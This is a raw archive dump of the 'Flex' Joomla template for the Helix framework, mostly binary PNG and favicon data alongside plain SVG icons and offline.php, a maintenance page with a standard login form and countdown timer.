��lJ�<�Z�9B��g܈�3CT0 ☁?P�k�T�ܡv��-yd�B�ԫ�f�`�|�lT@�<� �)��Q�p8^4I��rC-Wa��$�|����|����38��$�~��2�`o���5����Eȸ����Ak+md��'�}>e�{?�4x�ZՋ)C���-�Sa;�v�t`�,�l?"k�\���K�;L��|�p侍��
|��<ig:���@b����0���"�nV�E̐���z�«�B�V:��
KF��_��h[�mo��}�%.�k�4�&���!(�W�d�&���N���8�%B�Fڳ`�2$@���\�"���XD�;lA�]
��x���F=��(�H��a�%K��J��U��n���1�r c��#n��ӑN�>������z��l0�4�3I���1C�CT#�k�;K�.4߈��8a�8�$�&�K�&X�N��5���˗h���,V(;�fc�/�K>]�<Ϳ;�!l�<�&���e�c��R�*4�K��a+�@o/�J���c�{�	A��������þ�Q��2�R����9�fH'�߃0$���p����~I�V`�%�ڑ&KτG"�&����v#�<?n��u�w����)�L_��v��UK`��
粲z����'c�姶f��p驟[C�Tx�h<n����!��j�.ܛ�Lia�*!�6Ť�����x�KK�EL
����7�����!��"p�l&�ܝu*b$�@�WapT]8��<�m��l���Wʢ{����>t	<�)��B�-��L�ß���s��z[��CH86�.�V!1/օ܉w��p��� �C1yW�
�bV��A��q���rCX��-��=�xN��&K�.O�jJ����D�$@ez$��zdtF$�W��__�:�8��an�"n1�6,�W��+��必y��vi���H��p�XZ��Ĉ"?�%\@e�L�}�@�E����$R8�p^U�E�(*�C�`	���%H��C���q!ܝ�oA�}m��C¡��~��P}s$胙ɋ�$�"@d�	q�J��b
�T�XL�(��Q��6�.Z�$L.(M
7[#^OU#ܮ��{%!�r� Az$v�����Qc�*��5��?D@Idv��!���k;�"�o]�QL�p�{�NL�0�kEA�
��9�Ec��u@��#����_���ELV�_�̓wiw�%�~q� ]o��uۖ�)I"��:4`SXF*1K#�pݸ�=��\��{�O��
G8[q��V¤k�o����f�f�"��l�R�3�1E�΢��RM��kd.-��d]���8��A6�(fŖ6k�PX��-�JlTҹ�xW�{�����7o��
MJ�\���(�$�/�F���2	����e��N�.�7�H�lv�I9
����n�,�ω��%��X��_�cfI�Q�8b�vw�iIDAT��+��G6L�BQ����r���F�$]�.o��wݔ�ra��ņn��ߊ{f�Y�2e�����P�I�"�&��B��w��ն�7�<:�hA�5+��&�G��5˦������&9��1F�����@G��N�3\�GÚM.|��{==�O9�_���br��fY�~������
�u0wo�.X܌���I�"-E��7!ɽ��
��pP�ya��.`�/0�.w�{�j�E.�r�lJZ{�M9�M��o
L�hQ�z�z4�9Qk��T�8ց�̄�&W��8'�3;Ջ���=��'HE$&!�,��[�0	D|�z(�K�Y�^6{�ʌ���^x3��5?�L15"|
��	��w�T���zs|�Ʌa��Y���n��{�	�?�J�[�ZfaB
�Bp0 Cݗ��q�c�*�]�!3�8��jF.]�̀���U�����on�����<|#���YZg�{\7��<͚n�E&������#��H��0�v`c�s�N�j�f�H��d
���� �L6�*��]ȉ�
�%z�a�to^��(Opƻ��%�&�*�X�!�Q5���^[��3]��B�{
�u��)2_t Rl�M̸��l! �4>�N�@�5�O��sz0 e;�6��2'I ۭ��{uI0�n

�B^ach�x������yמIM�c�օ!�Pߕ*wvN�Y��N�킟5�D���
��"���@2ׁ�kRjc�y�EŖ�a����G��Zz�]�Yr�+�熣Hn��4b��:w��~EԐi��
3Y	�^�r�&��&��U�(Mʺ9�'6�G"7e��X��ĝ����ͤ�nX��:w��1�!�L�1剌:cz�B},�Sgwb���G�C.����<mg�8�XfJ�U�Q���,������ʰ�pM��W2��m`����y���6Ҁ$<O"��
H_^�eK�a����r8�}p	��Mx��́���Z�`��5�I�W�c�]�{Z����v#S���6/�O��J��P�c�$)�x�Y�2�3@��.T��y�5$+�o#;u��>��d=3Tb�">\"�#�Em�k@(�K����}6�\Y^�U�Xɏw�Bz���Y��`���]��9�g�v�&�Nq3^t��TX�5���z�_�A�0F��6�h��c�2`�%��Q�k�2��88��.�y>����R�w-MK�i���v����qv4�T	ӤL�m�Y���o�F�	5�@��+~}WI:������EK�_Ґ�RJ�!9~]�TU��,zZ&Xe8�ΐ쓽Z����(�'������Y�@�,�ʞ���D2�
�R	>i�Ug�g�oFV�o	
�p�5�!����Q��3Lr�׈~zր}��P;\��^�����;��o�-�a��3ۭ�0MlW�_N!���3;��-LV\�(I��n��Q^��v����j����0�̌)?�!@we]�`��%=��0�z��]�0��7��53�9*"e�UB<6\����n�ګ���%�m�F�.�0HxӾ��싰��ȶe�S�,L���������^�n�}���S#��qd���d��f�Ϙ!�{`�$�"nЄ+|;I牅�� �>g��;_A?�s@R�9w5G���pgZ]X����9yȋ<Zغ�^C�~E���w%m9��O+���YD����ϙ!�a�۵�����p($K1�j�Dd�(1��%��6iRo�*�I�nƘ��T�'Z��g�J��!�۪�>i������R��R�!�I j��~`���@D���y8�D��G^��6��2 .fw�K|���BJ�*k�Ѽ.�Q���R��O�]K+)�˺0 ��ff�A4���R�6�N���rV��x��(͈���jI��Z�:"C�f3Hr�	�l}���n�Z�Te�p���"5Qk��*KJ�����$j�/���ե�QLȱ�$Kj�B~�A��E� ��'D�}�ڮJ2�#��R˦ ��z�1$��K���N��K�{����-�	��m4UU���\�H�L��c`I4��b����vk,/u�~��2�����2�흩�V}�'�gd�G�uI�T�Η�0�c�K�P��<�GHM֞&�9]F�f�ͬw�j��{�5�(��-@���j@cC��p���KMy\��)z�I�dd�\�aܐ\�4���P9�	Fn>ά��Ԯ��.���p:�>��H`��//&V4�׋R�k̒��+���-��>z\�Z6X�e
��+k��]J�^�n���4��jM=l�;k�\8�����V\�"�^F*_�Epx�gYÐ܃ԭGBD�t��y9;�$���@��N#H�)҅��f���d�I�D,L4�z�����O�_uŻA�A�]K�\H/x�9�zK��7�l�a��y^����/:֙��bO��"[/�>��]�_�q_oe�)��
=]	��/ʗ�IY����t>��W�2�)*�0��Gі�Cز):�ё�I.g�v���?�O�� �+K;��ik��q���gM�VӇ�;��f9%��7DžvVw[��'����Ɏ�u<q7������F7E�	h�Qm�����h��3[��� \]�9�c��w�;���ǿ����w�;���ǿ����w�w�����G��w��N��ǐ�ǐ�ǐ�ǐ��D�����o_knN����|�c�i��{sUa8>��!�c1�����c^[@(��]��h��,���oB�&H~�,ո�r:�qzw"�Z�V~ug��\�S�!��L�vT�2W�N�'6��r�����KO��$�W�9�-���xgd�����u]�p���o"��C��/�6����m���&�xg��"d…�fI�R.B�e`
g�ԫ!S���l%�^�>�=Şg�4
H�g�	�.��o۶��c1��To�mi�<{y
?m���
����_�@�7��:�G�Я�C/ڇ�sv"��#yg�s��֪�����)�G�k�WDR�-�v�p�5����)\ǡ�p��Ǫ.T��~�0�I�^LG3�U��m�M�v��Lۭ��^P�Ι����<�-|r�1A�N]��p4�mJ��
�b�
�:
���&K�}N�`��Z�Yk ���D1�l�n�	!��j�m�h��ՅB0PZ�$����^�R{H���@T�8��8�2�$5+��pe��xV�'!����a��lՈg���K�q�01c=�I�@0/�eI��04�H�D�5ܺU���j�C�#�3���73 ���7����r%��!IR3i�8�H@��B
�h��	��_L��K�0���hQ7���>+�n�Ds��H���q��RG����h{4y���Е��G�Cb{X�d�2˧.M��NM��?h	k�sjYih
W�C����}�y�Z�)�щ�w��z},L��C(b���/ْԦ��+>b!w5mIbϽk�}�j����"GY$����V��`�\=�C0-)�G@�棙#���!�г�t��}�����HM]��:T�:��K\x�
,K�іi�BBF�՗�`���\[�5OJ&�n��x
I�)�����3u�ϻ��.��G��I"B�j�b�T=��
&�[11?��V�kC��<s-�I�y&#/nPj�S^X�!B*�p����dON�Z�v1V�$�m*��R�Aȴ!��N��Pb���3<`
�O���^�:	Q�3t�%�B�|���p�E]%&�1�%{�!��w?�z�=�kY�
q-�p0�O�\�����V֑���X��1.g�)R�3���:�n�V���ֳj�\M�ɛ'Wu�zs�I��%��	0�����R�/�R��;(�R�m:r*�Wg���|����
��ʊ:��$?
�)�SwBH��W���N\�AOC84���t�xM 7��}8�t��2i�תv�ԌԖo���|JVl����)K�W|@%Q���B;GO��.Qx`�R?)��z�\<XQK�4�B/��Ti�^:1��ȭ��։
?Q$$,^RPt�/�-3/�͚F*^�\=�Q����w>�M�n�f��og�4BN���­�V-��k$W���z9APо�UW�Z j큇���
���쑞:S@gZq)��=!U��50Ш-������pTwٛ<�oAHB���,n���e��R�җ��FȑWl @�1��.`߸����.�eAG���3��?G�zr!�B��BN � ��� �Bԏ!����A��lk�O d_M���B�� �0Bz��4B�� �0Bv���"DN�|χ�ˁ��}r!�˪O"D=y��z���������IEND�B`�PK!����flex/offline.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

$doc = JFactory::getDocument();
$app = JFactory::getApplication();

//Load Helix
$helix3_path = JPATH_PLUGINS.'/system/helix3/core/helix3.php';

if (file_exists($helix3_path)) {
    require_once($helix3_path);
    $this->helix3 = Helix3::getInstance();
} else {
    die('Please install and activate helix plugin');
}

// Remove the generator meta tag
if($this->helix3->getParam('remove_joomla_generator')) {
  $doc->setGenerator(null);
}

$offline_date = explode('-', $this->params->get("offline_date"));

require_once JPATH_ADMINISTRATOR . '/components/com_users/helpers/users.php';

$twofactormethods = UsersHelper::getTwoFactorMethods();
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php
    if($favicon = $this->params->get('favicon')) {
        $doc->addFavicon( JURI::base(true) . '/' .  $favicon);
    } else {
        $doc->addFavicon( $this->baseurl . '/templates/'. $this->template .'/images/favicon.ico' );
    }
	
	$this->helix3->addCSS('bootstrap.min.css, template.css, font-awesome.min.css')
    	->addJS('bootstrap.min.js, main.js, jquery.countdown.min.js');

	//Custom background image
	if($offline_bg_image = $this->helix3->getParam('offline_bg_image')) {
		
		$offline_bg = 'background-color: transparent;';
		$offline_bg .= 'background-image: url(' . JURI::base(true ) . '/' . $offline_bg_image . ');';
		$offline_bg .= 'background-repeat: no-repeat;';
		$offline_bg .= 'background-size: cover;';
		$offline_bg .= 'background-attachment: fixed;';
		$offline_bg .= 'background-position: 50% 50%;';
		$offline_bg = 'body {' . $offline_bg . '}'; 
	
		$doc->addStyledeclaration( $offline_bg );
	}
	
	//Body Font
	$webfonts = array();
	
	if( $this->params->get('enable_body_font') ) {
		$webfonts['.offline-container'] = $this->params->get('body_font');
	}
	//Heading1 Font
	if( $this->params->get('enable_h1_font') ) {
		$webfonts['h1'] = $this->params->get('h1_font');
	}
	
	$this->helix3->addGoogleFont($webfonts);
	
	if($offline_bg_image = $this->helix3->getParam('offline_bg_image')) {
		$style = ' style="box-shadow: 0 3px 20px rgba(10,10,10,.2);"';
	} else {
		$style = '';
	}
    ?>
<jdoc:include type="head" /> 
<body>
	<div class="container-fluid offline-container">
		<div class="row-fluid">
			<div class="col-sm-8">
				<div<?php echo $style; ?> class="offline-inner">
					<jdoc:include type="message" />

					<div id="frame" class="outline">
						<?php if ($app->get('offline_image') && file_exists($app->get('offline_image'))) { ?>
                        	<div class="centered-logo">
								<img src="<?php echo $app->get('offline_image'); ?>" alt="<?php echo htmlspecialchars($app->get('sitename')); ?>" />
                            </div>
						<?php } else { ?>
						<h1 style="text-align:center;">
							<?php echo htmlspecialchars($app->get('sitename')); ?>
						</h1>
                        <?php } ?>
                       
						<?php if ($app->get('display_offline_message', 1) == 1 && str_replace(' ', '', $app->get('offline_message')) != '') : ?>
							<div class="offline_message">
								<?php echo $app->get('offline_message'); ?>
							</div>
						<?php elseif ($app->get('display_offline_message', 1) == 2 && str_replace(' ', '', JText::_('JOFFLINE_MESSAGE')) != '') : ?>
							<p style="text-align:center;"><?php echo JText::_('JOFFLINE_MESSAGE'); ?></p>
						<?php endif; ?>
                        
                
						<form action="<?php echo JRoute::_('index.php', true); ?>" method="post" id="form-login">
							<div class="form-group" id="form-login-username">
								<input name="username" id="username" type="text" class="form-control" placeholder="<?php echo JText::_('JGLOBAL_USERNAME'); ?>" size="18" />
							</div>
							<div class="form-group" id="form-login-password">
								<input type="password" name="password" class="form-control" size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD'); ?>" id="passwd" />
							</div>
							<?php if (count($twofactormethods) > 1) : ?>
							<div class="form-group" id="form-login-secretkey">
								<input type="text" name="secretkey" class="form-control" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" id="secretkey" />
							</div>
							<?php endif; ?>
							<div class="form-group" id="submit-buton">
								<input type="submit" name="Submit" class="btn btn-readmore login" value="<?php echo JText::_('JLOGIN'); ?>" />
							</div>
							<input type="hidden" name="option" value="com_users" />
							<input type="hidden" name="task" value="user.login" />
							<input type="hidden" name="return" value="<?php echo base64_encode(JUri::base()); ?>" />
							<?php echo JHtml::_('form.token'); ?>
						</form>
					</div>
                    <?php if( $this->params->get('comingsoon_counter') ) { ?>
                    <hr />
					<div class="sp-comingsoon-content">
						<?php echo $this->params->get('offline_content'); ?>
					</div>
               	    <div id="sp-comingsoon-countdown" class="sp-comingsoon-countdown"></div>
					<?php } ?>		

				</div>
			</div>
		</div>
	</div>
    <script type="text/javascript">
		jQuery(function($) {
			$('#sp-comingsoon-countdown').countdown('<?php echo trim($offline_date[2]); ?>/<?php echo trim($offline_date[1]); ?>/<?php echo trim($offline_date[0]); ?>', function(event) {
			    $(this).html(event.strftime('<div class="days"><span class="number">%-D</span><span class="string">%!D:<?php echo JText::_("HELIX_DAY"); ?>,<?php echo JText::_("HELIX_DAYS"); ?>;</span></div><div class="hours"><span class="number">%H</span><span class="string">%!H:<?php echo JText::_("HELIX_HOUR"); ?>,<?php echo JText::_("HELIX_HOURS"); ?>;</span></div><div class="minutes"><span class="number">%M</span><span class="string">%!M:<?php echo JText::_("HELIX_MINUTE"); ?>,<?php echo JText::_("HELIX_MINUTES"); ?>;</span></div><div class="seconds"><span class="number">%S</span><span class="string">%!S:<?php echo JText::_("HELIX_SECOND"); ?>,<?php echo JText::_("HELIX_SECONDS"); ?>;</span></div>'));
			});
		});
	</script>
</body>
</html>

PK!�����flex/images/cd-lateral-nav.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" width="5" height="5">
<rect width="5" height="5"
  style="fill:#ffffff;" />
<path d="M0 5L5 0ZM6 4L4 6ZM-1 1L1 -1Z" style="stroke:#f4f4f4;stroke-width:1;stroke-opacity:0.8"></path>
</svg>PK!$DSB��flex/images/loader.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" width="44" height="44">
  <path opacity=".3" fill="#fff" d="M16 0 A16 16 0 0 0 16 32 A16 16 0 0 0 16 0 M16 4 A12 12 0 0 1 16 28 A12 12 0 0 1 16 4"/>
  <path fill="#fff" d="M16 0 A16 16 0 0 1 32 16 L28 16 A12 12 0 0 0 16 4z">
    <animateTransform attributeName="transform" type="rotate" from="0 16 16" to="360 16 16" dur="0.8s" repeatCount="indefinite" />
  </path>
</svg>PK!�u�E��flex/images/empty.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" width="5" height="5">
<rect width="5" height="5"
  style="fill:#f9f9f9;fill-opacity:0.9" />
<path d="M0 5L5 0ZM6 4L4 6ZM-1 1L1 -1Z" style="stroke:#e9e9e9;stroke-width:1;stroke-opacity:0.8"></path>
</svg>PK!�Lʶ��flex/images/vm-loader.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" width="44" height="44">
  <path opacity=".3" fill="#444" d="M16 0 A16 16 0 0 0 16 32 A16 16 0 0 0 16 0 M16 4 A12 12 0 0 1 16 28 A12 12 0 0 1 16 4"/>
  <path fill="#777" d="M16 0 A16 16 0 0 1 32 16 L28 16 A12 12 0 0 0 16 4z">
    <animateTransform attributeName="transform" type="rotate" from="0 16 16" to="360 16 16" dur="0.8s" repeatCount="indefinite" />
  </path>
</svg>PK!<�[A~~flex/images/favicon.iconu&1i� h(  #.#.͐PK͑Q�͐P�͑Q�4@�5@��5@��5@�_͑Q�͐P�̐P�͑Q�̐P�͐Q�Ҕ1G,5�Q5@�5@�4?�5@�5@�5@�͑Q�͑Q�͑Q�͑Q�͐P�͑Q�Г;�ǑOz7?�t#�7C�4@�5@�4@�4@�4@�͐P`͑Q�͑Q�ΒQ�ˎQ�ƇN�ɊQ�Ԗ����*.��$�1;��7C�5@�5@�5@�v͐Qy͑Q�ˎP���_�ŅQ�י���v�0;��4@�5@�l͐Pe͑Q�‚O�?ć�B�諜_�ljU�Ԗ
���$��5@�4@�DɊQ'ĄO�ƍQ�Z�y�B�|�D�r�M�gOѓ+lט���a�CN��*,�50�5-���[Dc�v�A�~�F�d�?��Z��x_<E��%�82�3M�0A�}�B��F�\�6�����z/'�),�9#�-p����cB�{?B�|�F�^�7�����������,6�2�7#�/f���������(C�{eC�{�G�[���^�����!���50��7�A��������DB�z~B�z�B�y�D�r')�а�����!�����;��������uB�zsB�{�B�z�B�}�C�z�G�V�G�Z�+��������������������������B�z�B�{�C�{�B�z�B�{�A�}�F�_�B�|B��Q��������������������B�z�B�{�B�{�B�{�B�zhB�zBD�k����D��V������������B�{3B�z�B�z�B�z~��l��������D������3�����Ç��3�3�����PK!`:p���flex/images/gmap-marker.svgnu&1i�<svg version="1.1" id="gmap_marker" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48px" height="48px" viewBox="0 0 48 48" enable-background="new 0 0 48 48" xml:space="preserve"><style type="text/css">.st0{opacity:0.19;}.st1{fill:#ED6E6E;}.st2{fill:#B75555;}.st3{fill:#913D3D;}</style><ellipse class="st0" cx="23.5" cy="41.4" rx="9.3" ry="3.2"/><path class="st1" d="M23.5,5.2c-7.6,0-13.7,6.1-13.7,13.6s13.7,22.6,13.7,22.6s13.7-15.1,13.7-22.6S31.1,5.2,23.5,5.2z"/><circle class="st2" cx="23.5" cy="17.1" r="3.8"/><path class="st3" d="M23.5,14.1c2,0,3.5,1.4,3.8,3.4c0-0.2,0.1-0.3,0.1-0.4c0-2.1-1.7-3.8-3.8-3.8s-3.8,1.7-3.8,3.8c0,0.2,0,0.3,0.1,0.4C20,15.6,21.5,14.1,23.5,14.1z"/></svg>PK!a����flex/images/svgwhite.svgnu&1i�<svg xmlns="http://www.w3.org/2000/svg" width="5" height="5">
<rect width="5" height="5" style="fill:#fff;fill-opacity:0.9" />
<path d="M0 5L5 0ZM6 4L4 6ZM-1 1L1 -1Z" style="stroke:#eee;stroke-width:1;stroke-opacity:0.8"></path>
</svg>PK!�C��  $flex/images/presets/preset7/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���TPLTE�������������������鶶���ꀃ餤�~�瓓��������������������쬮�풓빻򞞞H-�tRNS&�fă�A?��U�{�RIDATX���r� ��`Z#�j<y��<�%Qhk��/��e_;)��T]/�N�z��I\ ��rV��2V��X���}H����o!�!�j-a͔ҟŪڕ�븮k����z�~#�ԅ4�����o�
�"�0P�;�^�u$���.5�h�Zca�6Fl����Xm�tE1���_
���x���Ǖ�%���|��%��'�C�j�mn�K���B���%�&r	���<�x֜DZ&iT�~�T�г��ea	�R^�@am����z-�s��o�z�T�I��co�Jޤ��ȡI/�z�_e�X-�DR]��[x�F��i]��P��ƕ|DZn��;�9�1X(-Z��o���r�dS���$q����2�r�X.6�]>2(�3z%�
J�܉syw�u	0���"�M�-Տ������ZY,(��D��o�
�*�X��\LqM;X��4��I��\=rx�?�wb�`#��������2�ÂX�K>|?A����u{��.gd1��#ؿ���ד1p~B�K~�D�~s ��2�)P>д�t�T���=~���v�����S��&ce����K�$����������9W��IEND�B`�PK!l����'flex/images/presets/preset7/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���?PLTE������������������~�肅볳�~�瓓���������������흝����ʴ(
tRNS�}��@�FjN�IDATx��뚛 �=YO���Dp��v����v�>ͻs�I�a```|Hܮ	���~�W�EV��B��Y����G-��Űn�K�!�BXa!,����BXa!,���VjX]�a�.,��
�Y%��_�ָB�?<���BXa!,��y�G�������a�n�a!�߁�Tfs��\�()�ˏ��w�[A�'�t1���WNX����~��LZ���Re5qw��xn?22�2��ԟd�7sz)�NtF�]�B,Ѷm:X����C0Rn#�Գ��jmV.�h����4Zt��h.���,��H��/X�+,��8̡���Djٖ�Ǯ�
���m�Z	���{|m�Ӷ(�㻶ŀ�z,YB�j�T��zb��&�ֻ
�R��y�KX+-óV�
P]��~�@�I�M3�ն�^.V���*h7QVV(XyxR����~W�`Ͱ�De�2V�PK���>��	�n��Bϰ�a)a�-h3�
���H��XgV������5�JZ�{������ ����#�7����[[ox��CgA��rcĊ�/�ɰ<����{�U�*w,�*B`�Ҏ!�s��峗�ڪ��kb�h���F�e{ �lX��'>��L�A�g���a)i%�uojCW�z���柇m����V�֓V����ctJ��YX�vHR��7���y���r����	��h]�:,{�����������5�YC�LH�Ԣ%�Fko`��X�WQi�;C�rG�OQIa�џ��*{X�ہ��h�Bڦ%ޠ�;
s�,�uw��J(Z��V��Tv�熛��f�:�P@��XD����X�5}=�:�iXZ��U/g8��=r���aQ��f"�צ��7�XԨt�̠��c�'
��Zehs"ږ�DZѪV��$,Ͷynm�rK�Jd���:pB�`���aN�β��ޣ��c�@:d\b`��9Üh3���A����!�kgpV�2'����a�e��Q�He)\�:��wa�nޙ-�
,	sܙ�%;r4��Qyi�q��aeJ�x�ײ?�M�#�VБ��V+�b��KƝ��5m4;�>�(%u��n�T��,�Qn���3�1g�W�Y9���/g�	��3k�JBXs
�+��Ō+g��R��b]�i�?b�ɿ>���1��m4X����E���>��׿UA��1��kJ��Y!�{�<a�;� ,����BXa!��A/��Q�4p�~|�gX\�?��Q.��i��7��
�-�����:��ݴ�9�)IEND�B`�PK!}��
$flex/images/presets/preset3/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���EPLTE��������������������V�����V�����V��V��V���������������v�钞W�O
tRNS�¢�&ſA?f��	��AIDATX��떂 �E.��w}�G
3Y�a����׹l�2˒�t+��^^Eu�".F��_�Ub	+a%��5
>M���V��fJ�{�J_rQ]�4a}�z乽k�}��v⫰~�[߁UAB�rü���XbMy�h�R��B@>�A��%	�j;UQ�P�4�`��D ze��b��p�b��H�#[�x��A�K��Hk�m�
V���/B?�%�B�T|�8�c�¨��he����y
��¥�ȉ��`���ڏ�̉>z�Ńe}Q���7�Sm��a�T�s,�ijh���VLj��c�B�4�MC���Zg4��{���qYv*��`��h1�h��xYX�>q�Dj��2s��n:�|�嵔<����ą�5��˹�./�1���X�h�o�~T��r�W�(/�an��`�iӆH�}��k.�Y]7`a]���&w��9v�0�?�wb�`3�`���m�iC׈�K
.�� �x�)�G��.lmd�`��r/�3�d��Pm�@��x�@=�e�ρI˰�@��q���{�|��{����q
�jdNolVº
++°na��'R%�JM�]X���IEND�B`�PK!����%%'flex/images/presets/preset3/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���6PLTE�����V��V�����������V��V��������V������������}���ĩނtRNS��h~�(@�F��T�vIDATx���s� �������4\`�@�f�3w3M�]>����v�����kq/W�j��!�������d\,�~�b=�j{Y��/a}i;$,�",�",�",�",�",�",�",ª�5t� ,�,�lb��?�K�/ƺ�k\��",�",�",�",g!�Y��K'��c}vՁ��3XJM�l�+�%�h_��g�u���WdYŨ���X�(�d�BA�����e3+oo���x�����,�5������t��ȀQm��"���n�^_;�U��W�P��p�̎5v��CU��.3Z�t���`E��y.��P��2�*a)�4�E�-[,�Uk\�~�YSU��V'�2�z�3�(V��Z���^u0C�8�m�.[*[��`�}Ya�:[���k|%;~�([��V��l��?�-�`)Oxj���G���d5�d�,�!�D,�y��w�MY��Z�3ˬ�2
�W|8�(,�L�;"�V�~ȐY�Moazv���T��X��V����tǹ�<+:��f����l4}ͱ�9fY������w�/�c=��-\/�w���,��<������y��אe�1~8�%�6�Ek6�3k��9VJ��i,Q����Y�+��ӂ���?W��O�*X�VgR%ky��e+0t��,^{P��I���۰��,b�[i�c�D'�y�ش'���X?�n��6��\fZ=��4�q�K���D��`�Z�x�(��]���DP�$�s��
��1��B�V�����^�u�[�$k����K��M�Mk��j��5�˱Z�<���+f�}w3'c�B�H�m�}�,�V�п�	��0&4�lqq&�>R�6��V��5��T?�s��b`8$��_���͜le�a4��3�PZ
��?v����a)F��!Z��!co�ՓK��R޽Rݞ�d�C�w���Zc<��-�yD+�Y�\�3���#G�֓�G���,�]���ʁKp�
�)|>k�[`��e�D�u(X{>$��<ά�����!ĐT�1'����48�ua�c���#����	�
L�:g�
k�������N�+z��`E���V�Eo�AX�EX�EX�EX�EX��������y2�?��RV���ﵰ�~��>�H6����%?�����o�?-{�:�0�IEND�B`�PK!H�9�$flex/images/presets/preset4/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���KPLTE������������������&�ᶶ�&�ᓓ�&��&�ᓓ������������O�皚����r�����ZtRNS�cÃ�>?҉�V�LIDATX���v� �Ǥ�Z�M+�E4xsj۵�j�Y�2�g3IQd%�^%����#Iq�4����:ce����a�Ϙ���z>bzF�D���	�G��Xsy�4����z�#���4����z3���()c��Ā9<����(��Jl�ʼny0p�L����I�(��&u�g�h�i��	cM�h�d��{��a����zԾ��=<����,���%w_R"O���A�\����2Mb[��O�
��^쀱^��c�g�
qk���5�����_3�o"R����Ųm�(�еw��[�� 9�dg�����&���$e�;�fy˥6��8�6�,�NVkJ˥�],Ѭ�屄�a�%{�r�N{J�{���˓XQ�ӓ��&��L�)!"�<����gr�̣�X1��I	*��cQ���#%�N�r[b8�A ה�R�;��6��I�l6�t>&�:�z�W��T���0�ᰄa'6��`�&�{�
��X0F��>r,n�������ŜW�2�?�Rn��/i�i��m��?}d=�4��|�ʯF��M��XWaU�"����TY	�/* ��IEND�B`�PK!o��emm'flex/images/presets/preset4/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���?PLTE������&�ᢢ�������&�ᳵ�&��&��&�ᓓ���������_��N�痗����?�etRNS�Y���@7�h$=�IDATx��ٖ� �
4vp{�g����
�`NLUN_��9㗪�Z�x�����}��ֱ3�j���V�s2Vךv2��
��O��uY]�֗�!�X`,���X`,���Ѱ�=��z/,��L�����Mָ��4���X`}3��<`e؇��t�zX��:,��X�Oe6X1X����E�8��n��(��8�ŌDaq4WP��y������'X�jX��%�NuPG�W^�(�ׄi����u��5��Y��.�|����;`!�U:-j����a�Sz�$5Z����q����d˿Іl�2��%&Xb���힥��!S���-����V��a�K?i�/Zo��G��dpQz���a	U(��%Jx"^���s���lr�򰺵� \+���D��'�ԫ=�}�E�х�׀%�:������ē�WU�PN�#�:�e����Yڇnhr,�o�3+Š�6,a6�D�R��,�Ȍ�.�;�*
h��<Xm`e�߰
yp!��l+�����X�����s�R���V~��x���"-�yAX���‚��Y�,Z��,��J���Z\�XS$
˹d��_B���&Z�X+���KtJ��nX�SCUn+���j}X<�?�a�p/�~꠺Ž�~?,M�Xn��&��T�e��
,b��Ko���˝����~X���DX$]���(?��V��p��
K/{a��V�6�YJj|�'-+�sCd��(��@>�%';�sCǷd2�&+3-L=j�|Jt������0��V֒y��g�
��.1ɴz�p���*F�V�Ü���8��m�J��&m}��
:5�A�y2͖M{0�G���ȩ{�A����A��HlR�ؓ1�X��h�3�)6�H�� m�J��&i�w3T�?��ZnD�oe8n�|ɕ\_	��6,l�2r�<4���R0�L�Pn���f���9>w²�8c�#�9�Zb^h ���hJ�&TIq۟E��_luڸ�%�@!*#[y���ձ�h����bg#�(�s����rh)[w�m�YSg�q�����WC�Q<D��wZ/ֹc�I����K�Y%n���o��&�e���}�_�W�2�2XZɬ�5���C�X`,��VI�a��y2��aq*V����\��>K�|O)�M�P�9������>�=#�j�/IIEND�B`�PK!���$flex/images/presets/preset6/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���EPLTE������������������̋`���̋`������̋`���������������ư���֢Вjߵ�vt�tRNS�7���A?g��H�VIDATX���r�0��M���z���7`���3>��_�)�����PyU����D�GqV��2V��X���.�᧱�WH]K�{��R�G��Pr��T��`V�oĚڐ����]X_�?�%*�9��c��<�:7�=�p��bϝ�K��SxI͑ _��5�f�����,���^�2��s�&k�깔�7�� xR�J��jkԯ���-��n��g82b)��:Y��v�4Z��}��Xs���#��6�RX,�r\9��>`��^%��1�D�ک5v�)֒F�bsmz
V������"P;���\�l���
��x� ��[��z���)�F`	�-��i�6^��4�'�{Ytm�sY�f8>l����I((Ur'z\�އ��H�K��A�e�>�R|��t�k���B���T�#d�R.��c]�q�Nj4�lnIכ��������\�h�L�\H�*��0��-"r���N� �z��Ħ=۷���^`�0n���h;������5�2��]?��D�7.�Z����th�T��T�������m���42N������Š�sEބU�1XY��Ќ���IEND�B`�PK!��U�kk'flex/images/presets/preset6/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���6PLTE������̋`���������̋`̋`����������������ӝ��۬�֡~7��
tRNSǤ��@�F�PE�IDATx�흋r� E�$$����1/K8��v������eY�^.�-ne�!���T�9�Jd����u-_���°n�G�a!,����BXa!,����BX�6,���BX����X;�l�ðn��?^!�BXa!,��uVD�������yX��: ,��XR>��R"�,��r��S��t+�}E�.F]X�
�ũy���/0i��QRVYcTT�%�s
���A����Ea�N���-Q�."��FB���Ƥ�N���.,
_����N��V��Ơ5�j�ϕV]Xl?���Dn�(�^!X]c�2��K����y�Lf�V.�
����GY��p�w��(<:^�������65
�6�10�,�~C���a
